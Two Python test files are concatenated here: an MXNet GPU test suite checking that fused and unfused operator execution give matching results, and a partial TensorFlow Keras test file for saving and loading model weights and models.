# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import random
import itertools
import mxnet as mx
import numpy as np
from mxnet import autograd, gluon
from mxnet.test_utils import *
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import with_seed
def check_fused_symbol(sym, **kwargs):
inputs = sym.list_inputs()
shapes = {inp : kwargs[inp].shape for inp in inputs}
ctx = kwargs.get('ctx', mx.gpu(0))
# Double identity so that there is always something to fuse
test_sym = mx.sym.Group([mx.sym.identity(mx.sym.identity(s)) for s in sym])
rtol = {'float16' : 1e-2,
'float32' : 1.5e-6,
'float64' : 1.5e-6,
}
atol = {'float16' : 1e-3,
'float32' : 1e-7,
'float64' : 1e-7,
}
for dtype in ['float16', 'float32', 'float64']:
data = {inp : kwargs[inp].astype(dtype) for inp in inputs}
for grad_req in ['write', 'add']:
type_dict = {inp : dtype for inp in inputs}
with environment('MXNET_USE_FUSION', '0'):
orig_exec = test_sym._simple_bind(ctx=ctx, grad_req=grad_req, type_dict=type_dict, **shapes)
with environment('MXNET_USE_FUSION', '1'):
fused_exec = test_sym._simple_bind(ctx=ctx, grad_req=grad_req, type_dict=type_dict, **shapes)
fwd_orig = orig_exec.forward(is_train=True, **data)
out_grads = [mx.nd.ones_like(arr) for arr in fwd_orig]
orig_exec.backward(out_grads=out_grads)
fwd_fused = fused_exec.forward(is_train=True, **data)
fused_exec.backward(out_grads=out_grads)
for orig, fused in zip(fwd_orig, fwd_fused):
np.testing.assert_allclose(orig.asnumpy(), fused.asnumpy(), rtol=rtol[dtype], atol=atol[dtype])
for orig, fused in zip(orig_exec.grad_arrays, fused_exec.grad_arrays):
if orig is None and fused is None:
continue
assert orig is not None
assert fused is not None
np.testing.assert_allclose(orig.asnumpy(), fused.asnumpy(), rtol=rtol[dtype], atol=atol[dtype])
def check_unary_ops():
unary_ops = [
'relu',
'sigmoid',
'softsign',
'exp',
'expm1',
'log',
'log10',
'log2',
'log1p',
'degrees',
'radians',
'sin',
'cos',
'tan',
'arcsin',
'arccos',
'arctan',
'sinh',
'cosh',
'tanh',
'arcsinh',
'arctanh',
'sqrt',
'rsqrt',
'cbrt',
'rcbrt',
'square',
'squeeze',
'zeros_like',
'ones_like',
'flatten',
'round',
'rint',
'fix',
'floor',
'ceil',
'trunc',
'sign',
'reciprocal',
'abs',
'gamma',
'gammaln',
'erf',
'negative',
'logical_not',
]
def announce_check(op_name):
print("Checking fusion of " + op_name)
arr = mx.random.uniform(shape=rand_shape_2d())
a = mx.sym.Variable('a')
for op_name in unary_ops:
announce_check(op_name)
op = getattr(mx.sym, op_name)
sym = op(a)
check_fused_symbol(sym, a=arr)
# unary ops requiring special treatment
# arccosh needs input to be >= 1
arr2 = arr + 1
announce_check('arccosh')
check_fused_symbol(mx.sym.arccosh(a), a=arr2)
# erfinv needs -1 < input < 1, but we avoid the limits of this range where the slope nears +inf.
arr2 = (arr - 0.5) * 1.99
announce_check('erfinv')
check_fused_symbol(mx.sym.erfinv(a), a=arr2)
# Activation requires act_type attribute
for act_type in ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']:
announce_check("Activation(act_type='{}')".format(act_type))
check_fused_symbol(mx.sym.Activation(a, act_type=act_type), a=arr)
if act_type == 'softrelu':
# Check that softrelu implementation doesn't overflow on large inputs
check_fused_symbol(mx.sym.Activation(a, act_type=act_type), a=1000 * arr)
# Cast requires dtype
for dtype in ['float16', 'float32', 'float64', 'int32']:
announce_check("Cast(dtype='{}')".format(dtype))
check_fused_symbol(mx.sym.Cast(a, dtype=dtype), a=arr)
# reshape requires shape
announce_check('reshape')
check_fused_symbol(mx.sym.reshape(a, shape=(-1,)), a=arr)
# expand_dims requires axis
announce_check('expand_dims')
check_fused_symbol(mx.sym.expand_dims(a, axis=1), a=arr)
# clip requires a_min, a_max
announce_check('clip')
check_fused_symbol(mx.sym.clip(a, a_min=0.3, a_max=0.7), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=-np.inf, a_max=0.7), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=-np.inf, a_max=np.inf), a=arr)
check_fused_symbol(mx.sym.clip(a, a_min=0, a_max=np.nan), a=arr)
# smooth_l1 requires a scalar
announce_check('smooth_l1')
check_fused_symbol(mx.sym.smooth_l1(a, scalar=0.3), a=arr)
def check_binary_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
check_fused_symbol(a+b, a=arr1, b=arr2)
check_fused_symbol(a+3, a=arr1)
check_fused_symbol(a-b, a=arr1, b=arr2)
check_fused_symbol(a-3, a=arr1)
check_fused_symbol(3-a, a=arr1)
check_fused_symbol(a*b, a=arr1, b=arr2)
check_fused_symbol(a*3, a=arr1)
check_fused_symbol(a/(b+1), a=arr1, b=arr2)
check_fused_symbol(a/3, a=arr1)
check_fused_symbol(3/a, a=arr1)
check_fused_symbol(a**b, a=arr1, b=arr2)
check_fused_symbol(a**3, a=arr1)
check_fused_symbol(mx.sym.pow(3,a), a=arr1)
check_fused_symbol(mx.sym.maximum(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.minimum(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.hypot(a,b), a=arr1, b=arr2)
check_fused_symbol(mx.sym.hypot(a,3), a=arr1)
def check_other_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = mx.sym.Variable('c')
shape = rand_shape_2d()
shape = list((5,) + shape)
# Make sure there is at least 2 elements for the test with negative indices
shape[1] += 1
shape[2] += 1
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
arr3 = mx.random.uniform(shape=shape)
check_fused_symbol(mx.sym.add_n(a,b,c), a=arr1, b=arr2, c=arr3)
check_fused_symbol(mx.sym.slice_axis(a, axis=0, begin=1, end=4), a=arr1)
# Testing handling of negative axis
check_fused_symbol(mx.sym.slice_axis(a, axis=-3, begin=1, end=4), a=arr1)
begin = (random.randint(0, shape[0]-1),
random.randint(0, shape[1]-1),
random.randint(0, shape[2]-1))
end = (random.randint(begin[0]+1, shape[0]),
random.randint(begin[1]+1, shape[1]),
random.randint(begin[2]+1, shape[2]))
check_fused_symbol(mx.sym.slice(a, begin=begin, end=end), a=arr1)
begin = (random.randint(-shape[0], -2),
random.randint(-shape[1], -2),
random.randint(-shape[2], -2))
end = (random.randint(begin[0]+1, -1),
random.randint(begin[1]+1, -1),
random.randint(begin[2]+1, -1))
check_fused_symbol(mx.sym.slice(a, begin=begin, end=end), a=arr1)
arr1 = mx.random.uniform(shape=(2,3,4,5))
arr2 = mx.random.uniform(shape=(1,2,3))
check_fused_symbol(mx.sym.slice_like(a,b, axes=[-2, 0]), a=arr1, b=arr2)
arr1 = mx.random.uniform(shape=(1,1,2,3))
arr2 = mx.random.uniform(shape=(2,2,2,3))
check_fused_symbol(mx.sym.broadcast_like(a, b, lhs_axes=[0], rhs_axes=[0]), a=arr1, b=arr2)
def check_leakyrelu_ops():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
# Testing gelu
print("Checking fusion of LeakyReLU:gelu")
check_fused_symbol(mx.sym.LeakyReLU(a+b, act_type='gelu'), a=arr1, b=arr2)
@with_seed()
def test_fusion():
check_unary_ops()
check_binary_ops()
check_other_ops()
check_leakyrelu_ops()
@with_seed()
def test_fusion_compiler_cache():
# Stresses the internal cache of CUfunctions by creating the same kernel multiple times and
# on multiple GPUs if available.
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
shape = rand_shape_2d()
arr1 = mx.random.uniform(shape=shape)
arr2 = mx.random.uniform(shape=shape)
# Invoke the same model twice, second time will exercise compile cache
check_fused_symbol(a+b, ctx=mx.gpu(0), a=arr1, b=arr2)
check_fused_symbol(a+b, ctx=mx.gpu(0), a=arr1, b=arr2)
# On multi-GPU systems, invoke the same model on other GPUs
num_gpus = mx.context.num_gpus()
if num_gpus > 1:
check_fused_symbol(a+b, ctx=mx.gpu(1), a=arr1, b=arr2)
@with_seed()
@use_np
def test_fusion_boolean_inputs():
from mxnet.gluon import HybridBlock
class Foo(HybridBlock):
def __init__(self):
super(Foo, self).__init__()
def hybrid_forward(self, F, valid_length):
mask = valid_length.astype(np.float32)
mask2 = valid_length.astype(np.float32)
mask = mask * F.np.expand_dims(mask2, axis=-1)
return mask
foo = Foo()
foo.hybridize(static_alloc=True)
out = foo(mx.np.ones((10,), ctx=mx.gpu(), dtype=np.bool))
mx.npx.waitall()
@with_seed()
def test_fusion_different_dimensions():
from mxnet.gluon import HybridBlock
class Foo(HybridBlock):
def __init__(self):
super(Foo, self).__init__()
def hybrid_forward(self, F, x):
mask2 = x.astype(np.float32)
mask = F.expand_dims(mask2, axis=-1)
return mask
foo = Foo()
foo.hybridize(static_alloc=True)
# Pass 1-D data
out = foo(mx.nd.ones((10,), ctx=mx.gpu()))
assert np.all(out.asnumpy() == np.ones((10,1)))
assert out.shape == (10,1)
# Pass 2-D data
out = foo(mx.nd.ones((10,10), ctx=mx.gpu()))
assert np.all(out.asnumpy() == np.ones((10,10)))
assert out.shape == (10,10,1)
@with_seed()
def test_input_reorder():
class Block(gluon.HybridBlock):
def __init__(self, **kwargs):
super(Block, self).__init__(**kwargs)
def hybrid_forward(self, F, x, y, z):
s = x * 2
s2 = s + z
s = F.broadcast_add(s, y * y)
return F.dot(s, s2)
for static_alloc in (False, True):
arg_shapes = [(10, 10), (10, 1), (10, 10)]
arg_data = [mx.random.uniform(shape=s) for s in arg_shapes]
arrays = {}
for use_fusion in ('0', '1'):
with environment('MXNET_USE_FUSION', use_fusion):
arrays[use_fusion] = {}
n = Block()
n.hybridize(static_alloc=static_alloc)
args = [arg.copyto(mx.gpu()) for arg in arg_data]
for arg in args:
arg.attach_grad()
with autograd.record():
r = n(*args)
arrays[use_fusion]['result'] = r
r.backward()
for i, arg in enumerate(args):
arrays[use_fusion][i] = arg.grad
for key in ['result'] + list(range(len(arg_data))):
assert_allclose(arrays['0'][key].asnumpy(), arrays['1'][key].asnumpy())
@with_seed()
def test_fusion_cycle():
class Test(gluon.nn.HybridBlock):
def __init__(self, **kwargs):
super(Test, self).__init__(**kwargs)
def hybrid_forward(self, F, x, y):
x = F.relu(x)
y = F.relu(y)
z1 = F.expand_dims(F.sum_axis(x, axis=1), axis=1)
z2 = F.expand_dims(F.sum_axis(y, axis=1), axis=1)
return x + z2, y + z1
t = Test()
a = mx.nd.zeros(shape=(10,1), ctx=mx.gpu())
b = mx.nd.zeros(shape=(10,1), ctx=mx.gpu())
t.hybridize(static_alloc=True, static_shape=True)
out = t(a, b)
mx.nd.waitall()
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#,============================================================================
"""Tests for model saving."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras.engine import training
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.training import training as training_module
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
def test_weight_loading(self):
with self.test_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
no_extension_path = os.path.join(temp_dir, 'test')
model.save_weights(no_extension_path, save_format='tf')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
if h5py is None:
return # Skip rest of test if H5py isn't available.
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.save_weights(no_extension_path, save_format='hdf5')
model.load_weights(no_extension_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = keras.engine.saving.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.test_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = keras.engine.saving.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
class TestWholeModelSaving(test.TestCase):
def test_sequential_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
out = model.predict(x)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
# Save the model without any compilation or training.
keras.models.save_model(model, fname)
new_model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_2(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(
fname,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_functional_model_saving(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_saving_without_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_with_tf_optimizer(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse',
optimizer=training_module.AdadeltaOptimizer(0.1),
metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_right_after_compilation(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
model._make_train_function()
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
def test_saving_lambda_numpy_array_arguments(self):
with self.test_session():
if h5py is None:
self.skipTest('h5py required to run this test')
mean = np.random.random((4, 2, 3))
std = np.abs(np.random.random((4, 2, 3))) + 1e-5
inputs = keras.layers.Input(shape=(4, 2, 3))
output = keras.layers.Lambda(lambda image, mu, std: (image - mu) / std,
arguments={'mu': mean, 'std': std})(inputs)
model = keras.models.Model(inputs, output)
model.compile(loss='mse', optimizer='sgd', metrics=['acc'])
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
os.close(fd)
os.remove(fname)
self.assertAllClose(mean, model.layers[1].arguments['mu'])
self.assertAllClose(std, model.layers[1].arguments['std'])
def test_saving_model_with_long_layer_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
# This layer name will make the `layers_name` HDF5 attribute blow
# out of proportion. Note that it fits into the internal HDF5
# attribute memory limit on its own but because h5py converts
# the list of layer names into numpy array, which uses the same
# amout of memory for every item, it increases the memory
# requirements substantially.
x = keras.Input(shape=(2,), name='input_' + ('x' * (2**15)))
f = x
for i in range(4):
f = keras.layers.Dense(2, name='dense_%d' % (i,))(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of layer names.
with h5py.File(fname, 'r') as h5file:
num_names_arrays = len([attr for attr in h5file['model_weights'].attrs
if attr.startswith('layer_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_names_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_saving_model_with_long_weights_names(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
x = keras.Input(shape=(2,), name='nested_model_input')
f = x
for i in range(4):
f = keras.layers.Dense(2, name='nested_model_dense_%d' % (i,))(f)
# This layer name will make the `weights_name`
# HDF5 attribute blow out of proportion.
f = keras.layers.Dense(2, name='nested_model_output' + ('x' * (2**14)))(f)
nested_model = keras.Model(inputs=[x], outputs=[f], name='nested_model')
x = keras.Input(shape=(2,), name='outer_model_input')
f = nested_model(x)
f = keras.layers.Dense(2, name='outer_model_output')(f)
model = keras.Model(inputs=[x], outputs=[f])
model.compile(loss='mse', optimizer='adam', metrics=['acc'])
x = np.random.random((1, 2))
y = np.random.random((1, 2))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
keras.models.save_model(model, fname)
model = keras.models.load_model(fname)
# Check that the HDF5 files contains chunked array
# of weight names.
with h5py.File(fname, 'r') as h5file:
num_weight_arrays = len(
[attr for attr in h5file['model_weights']['nested_model'].attrs
if attr.startswith('weight_names')])
# The chunking of layer names array should have happened.
self.assertGreater(num_weight_arrays, 0)
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
def test_model_saving_to_pre_created_h5py_file(self):
if h5py is None:
self.skipTest('h5py required to run this test')
with self.test_session():
inputs = keras.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
outputs = keras.layers.Dense(3)(x)
model = keras.Model(inputs, outputs)
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.Adam(),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
fd, fname = tempfile.mkstemp('.h5')
with h5py.File(fname, mode='r+') as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Test non-default options in h5
with h5py.File('_', driver='core',
backing_store=False) as h5file:
keras.models.save_model(model, h5file)
loaded_model = keras.models.load_model(h5file)
out2 = loaded_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# Cleanup
os.close(fd)
os.remove(fname)
class SubclassedModel(training.Model):
def __init__(self):
super(SubclassedModel, self).__init__()
self.x_layer = keras.layers.Dense(3)
self.b_layer = keras.layers.Dense(1)
def call(self, a):
return self.b_layer(self.x_layer(a))
class TestWeightSavingAndLoadingTFFormat(test.TestCase):
@test_util.run_in_graph_and_eager_modes
def test_tensorflow_format_overwrite(self):
with self.test_session() as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
model(x) # pylint: disable=not-callable
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
model.save_weights(prefix, save_format='tensorflow', overwrite=True)
with self.assertRaises(EOFError):
# Indirectly tests that the user is prompted
model.save_weights(prefix, save_format='tensorflow', overwrite=False)
def test_no_default_session(self):
with ops.Graph().as_default():
self.assertFalse(ops.get_default_session())
data = np.random.random((1000, 32)).astype(np.float32)
labels = np.random.random((1000, 10)).astype(np.float32)
model = keras.models.Sequential([
keras.layers.Dense(10, activation='softmax'),
keras.layers.Dense(10, activation='softmax')])
model.compile(optimizer=training_module.RMSPropOptimizer(0.001),
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels)
fname = os.path.join(self.get_temp_dir(), 'weights', 'ckpt')
model.save_weights(fname)
model.load_weights(fname)
def test_no_graph_pollution(self):
with context.graph_mode():
graph = ops.Graph()
with graph.as_default(), self.test_session(graph) as session:
model = SubclassedModel()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
model(x) # pylint: disable=not-callable
session.run([v.initializer for v in model.variables])
model.save_weights(prefix, save_format='tensorflow')
op_count = len(graph.get_operations())
model.save_weights(prefix, save_format='tensorflow')
self.assertEqual(len(graph.get_operations()), op_count)
model.load_weights(prefix)
op_count = len(graph.get_operations())
model.load_weights(prefix)
self.assertEqual(len(graph.get_operations()), op_count)
def _weight_loading_test_template(self, make_model_fn):
with self.test_session() as session:
model = make_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
model.save_weights(prefix, save_format='tf')
for v in model.variables:
self.evaluate(
v.assign(random_ops.random_normal(shape=array_ops.shape(v))))
self.addCleanup(shutil.rmtree, temp_dir)
model.load_weights(prefix)
y = self.evaluate(model(x))
self.assertAllClose(ref_y, y)
# Test restore-on-create if this is a subclassed Model (graph Networks
# will have already created their variables).
load_model = make_model_fn()
load_model.load_weights(prefix)
restore_on_create_y_tensor = load_model(x)
restore_on_create_y = self.evaluate(restore_on_create_y_tensor)
self.assertAllClose(ref_y, restore_on_create_y)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_graph_model(self):
def _make_graph_model():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
return keras.models.Model(a, b)
self._weight_loading_test_template(_make_graph_model)
@test_util.run_in_graph_and_eager_modes
def test_weight_loading_subclassed_model(self):
self._weight_loading_test_template(SubclassedModel)
def _new_layer_weight_loading_test_template(
self, first_model_fn, second_model_fn, restore_init_fn):
with self.test_session() as session:
model = first_model_fn()
temp_dir = self.get_temp_dir()
prefix = os.path.join(temp_dir, 'ckpt')
x = constant_op.constant(np.random.random((3, 2)), dtype=dtypes.float32)
executing_eagerly = context.executing_eagerly()
ref_y_tensor = model(x)
if not executing_eagerly:
session.run([v.initializer for v in model.variables])
ref_y = self.evaluate(ref_y_tensor)
